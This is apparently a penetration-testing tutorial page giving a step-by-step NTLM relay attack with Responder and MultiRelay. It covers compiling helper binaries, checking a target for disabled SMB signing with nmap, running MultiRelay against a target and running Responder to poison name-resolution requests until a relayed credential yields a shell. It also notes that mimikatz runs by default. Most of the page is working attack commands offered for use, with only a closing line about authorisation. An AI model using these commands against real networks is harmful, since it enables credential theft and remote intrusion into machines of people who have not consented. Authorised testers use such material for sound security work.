NTLM relay attack

Attack tree

1 Set up MultiRelay
2 Run responder
3 Wait for it


  1. Install dependencies and compile some artifacts used by Multirelay:

# apt install gcc-mingw-w64-x86-64 python-crypto
# cd /usr/share/responder/tools/
# x86_64-w64-mingw32-gcc ./MultiRelay/bin/Runas.c -o ./MultiRelay/bin/Runas.exe -municode -lwtsapi32 -luserenv                                                                                                         
# x86_64-w64-mingw32-gcc ./MultiRelay/bin/Syssvc.c -o ./MultiRelay/bin/Syssvc.exe -municode
# pip install pycryptodome
  1. Test with:

# cd /usr/share/responder/tools
# python3 MultiRelay.py
  1. For this attack to work with SMB, SMB signing has to be disabled on the target. Usually it is disabled, but this can be checked using the nmap smb-security-mode script:

# nmap -p445 --script=smb-security-mode <target IP address>
  1. The MultiRelay script uses HTTP and SMB ports. To prevent conflicts, turn these servers off in the /usr/share/responder/responder.conf file.

SMB = Off
HTTP = Off
  1. If SMB signing is disabled, run MultiRelay with (-t) to specify the target and (-u) to specify users to relay (forward) to. Choose selectively to create minimal noise in the network.

# python3 MultiRelay.py -t <target IP address> -u ALL -d
  1. In another terminal, use ifconfig to find NIC of attack machine for running responder.

  2. Run responder:

# responder -I <interface> -rv
  1. Wait for a connection: Hopefully, someone mistypes trying to open a shared drive (a drive that does not exist). Responder intervenes and poisons the request. SMB relaying is now setup in MultiRelay.py, and the credential is forwarded to the and we have gained a shell on it.


If it is possible to poison responses but not possible to crack the hash, an option is to try to relay. A relay or forwarder receives valid authentication and then forwards that request to another server/system and tries to authenticate to that server/system by using the valid credentials received.

  • Activity can vary wildly depending on the network.

  • Inactive networks can take days or weeks before a connection can be hijacked.

  • Logs are created in /usr/share/responder/logs where you can look past sessions captured.

  • MultiRelay runs mimikatz by default and may be easily flagged by antivirus products.

  • The attacks described here should only be performed when explicitly authorised to do so.